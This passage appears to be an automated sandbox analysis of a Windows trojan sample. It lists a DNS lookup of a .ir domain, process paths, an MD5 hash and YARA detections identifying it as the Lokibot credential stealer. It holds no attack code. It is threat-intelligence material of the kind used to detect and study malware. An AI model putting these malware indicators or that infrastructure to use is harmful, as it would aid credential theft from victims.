                    Aug 6, 2023 05:17:06.291480064 CEST8.8.8.8192.168.2.30x1decNo error (0)mecharnise.ir185.8.173.81A (IP address)IN (0x0001)false
                    • mecharnise.ir
                    Target ID:0
                    Start time:05:16:57
                    Start date:06/08/2023
                    Path:C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe
                    Imagebase:0x400000
                    File size:612'864 bytes
                    MD5 hash:BF37ED340770102309554BE2789BECC4
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:Borland Delphi
                    Yara matches:
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.354230910.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.354230910.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.354230910.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000000.00000002.354230910.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, Author: ditekSHen
                    • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.354230910.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.354230910.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000000.00000002.354230910.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.354230910.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.354156743.0000000002460000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.354156743.0000000002460000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.354156743.0000000002460000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000000.00000002.354156743.0000000002460000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                    • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.354156743.0000000002460000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.354156743.0000000002460000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000000.00000002.354156743.0000000002460000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.354156743.0000000002460000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:low

                    Target ID:1
                    Start time:05:16:58
                    Start date:06/08/2023
                    Path:C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe
                    Imagebase:0x400000
                    File size:612'864 bytes
                    MD5 hash:BF37ED340770102309554BE2789BECC4
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000002.372103621.0000000002937000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000002.371920338.0000000000738000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low

                    No disassembly